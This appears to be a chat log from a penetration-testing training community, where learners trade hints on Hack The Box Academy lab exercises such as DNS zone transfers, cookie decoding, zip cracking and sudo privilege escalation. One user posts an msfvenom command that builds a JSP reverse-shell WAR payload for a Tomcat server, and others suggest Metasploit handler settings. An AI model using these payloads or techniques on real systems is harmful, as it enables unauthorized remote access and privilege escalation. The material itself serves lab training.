Remember that you can configure zones so that they do not allow a zone transfer from everyone
anybody?
I was able to decode the cookie using the tool on CyberChef, but I am not sure why I am not getting the same value when I use the Burp Suite tool to try to decode the cookie.
https://academy.hackthebox.com/module/110/section/1055
" The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer. "
didn’t do this module but do u have to select Hex option in burp decode
WTF
3h lost with that shit
was a bug
thanks....
repair that module...
or that section: WINDOWS PRIVILEGE ESCALATION / Other Files
Since this is also the answer to the question I would have remove the message
I recall reading that, but I'm not sure how I can know which hosts can do that without access to the DNS server and the config files stored there
Just try transferring to all of them.
Was that a reply to me?
Gotcha. I did try that and that didn't yield any success, but I can try again tonight
Well tools can be used against subdomains
So, much like trying to axfr to subdomains, you can iterate through a list of subdomains for the tool
Are you thinking of dnsenum with a list of subdomains?
Okay . . .
Ok let's walk through this
First step; you zone transfer to base domain, and don't find the answer
Second step; you try transferring to subdomains you find
Third; tools to bruteforce
Thank you for clarifying. I've done those steps, which led me to solutions to the other questions, just struggling with the last one.
Well, who says you're limited to using just the domain for the bruteforce tool, maybe subdomains can work too
Good point, I don't think I've tried that, I will give that a go tonight. Thank you for your help!
hello i am doing Linux Local Privilege Escalation - Skills Assessment and i need help with the 5th flag, i got a web shell from the tomcat but i cannot make a reverse shell
metasploit has a module for tomcat. use that
it has more than 30 modules and i tried like 10 of them already, can you hint me so i can be on my way
it should be the authenticated code execution
if they don't work, you can always use msfvenom
create a war file payload
i did msfvenom but when i try to trigger runme war it just does nothing and the listener is running on metasploit
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.52 LPORT=4444 -f war > runme.war
Started reverse TCP handler on 10.10.16.52:4444
try setting your LHOST to 0.0.0.0 in msfconsole
i did, no reverse shell
oh i see the issue
for your msfvenom command, set the payload to a linux reverse tcp, like linux/x64/meterpreter/reverse_tcp
then try again with this payload in msfconsole
exploit/multi/handler
HTTP Status 404 – Not Found when i click on the payload
and no shell
You should check out the shells & payloads module
This is explained quite well there along with a cheatsheet
does it say "the requested resource is not available"
I have a question regarding the XSS module - Session hijacking section.
I found the cookie, where do I input it on the login.php?
i click on my shell but it just loads to infinity and no reverse shell
i'm not sure what you mean by that
you upload the war file then you click on it, it doesn't load?
You could use the cookie editor extension or just fix in the cookie name and value with dev console in storage section
i had to look at ippsec's video again just to make sure i wasn't tripping
and i wasn't, i just forgot a step
this does work
unable to crack .zip file
from password attack module
you just need to navigate to the JSP
In the module it shows you an example on how to add the cookie with its name and value using dev tools in the browser
try --show you have probably cracked a similar hash before I guess
uploaded as what type of file?
a war file
specify the format --format=
is your rockyou right? I doubt it will go through the full rockyou with 4 threads in 2 secs
I personally dont use john for cracking zips, too slow, check this out https[:]//github.com/BoboTiG/cracker-ng
and no need to extract the hash from the zip as well lol
spoilers.
why are you telling me about sudo
ok, but what might be the problem in my case
the 5th flag is in /root folder
why use this when hashcat exists
also you're spoiling the module content
when you use a vm, thats where it comes in.
just dont use a vm for hashcat 
Mine doesnt have much resources
welp, my current pc setup doesnt really support hashcat 😂
ah unfortunate
i cant get root, i got the shell but no root, ChatGPT is also stuck
Good morning everyone! I was hoping to get some direction on the Offshore Pro Lab? Not sure if this is the right chat. Thanks!
verify your account in #welcome then you can access #prolabs-offshore
How do I verify my account?
check #welcome
you already have what you need
you even pinged me with it
bro look at the gtfobin and run the sudo command and see if u get root lol
i know what to search for but for some reason it doesn't work
"for some reason it doesn't work" likely means you're doing it wrong
but it also isn't an error
@faint rampart my frnd never knew that you had CPTS 😄
Happy to know that!
well i found the sh from the command in /usr/bin/sh and changed the command but still it doesn't work, i get no root.
The path is different.
The original command doesn't work, the updated command doesn't work.
I guess i missed something.
Guys how long do your nmap scans usually take?
when i provide the wordlist, bruteforce does not work
but when i do not provide it, it works
why
depends on your network connection, type of nmap scan
for CTFs, doing faster can be good!
until it misses one port that is important 💀
did you try the mutated list in the module
maybe its the version u are running?
I understand differences between different types but damn guess my connection is weak af
yes, didn't work
whole thing stops in 00:00:00:00
no root from original command and updated version. Still on tomcat user
maybe look at config files tbh i forgot what i did lol i remember not doing it the intended route and still passing it
they changed a lot on the system, that's why GTFOBins doesn't work straight out of the box
it has nothing to do with changes on the system
I doubt they changed the lab environment that much to make the intended method invalid
then why doesn't sudo work?
Its a straight forward command
sudo /path/to/binary <insert privesc part here>
i just finished the skills assessment
i think this all boils down to some kind of server issue
use EU server
or you are doing something wrong
i am on a EU server
i guess i am doing something wrong
i deleted it
i saw the image
did you have to specify the full bin path or no
no, it's already in PATH
enough for today, i am tired from work.
But i got further than yesterday
i mean it's as simple as copy/paste yeah?
thanks for the help guys.
u can show us the command u did so we can see what u doing could be wrong
but till tmmr 🤷♂️
but still i was tomcat
i have saved steps, so i can continue tomorrow from the shell
and try again
did you have to edit the command any?
no
i'd delete this still as it's spoiler
ok
i upgraded to python3 tty, idk if that has anything to do with it
hm... a clue

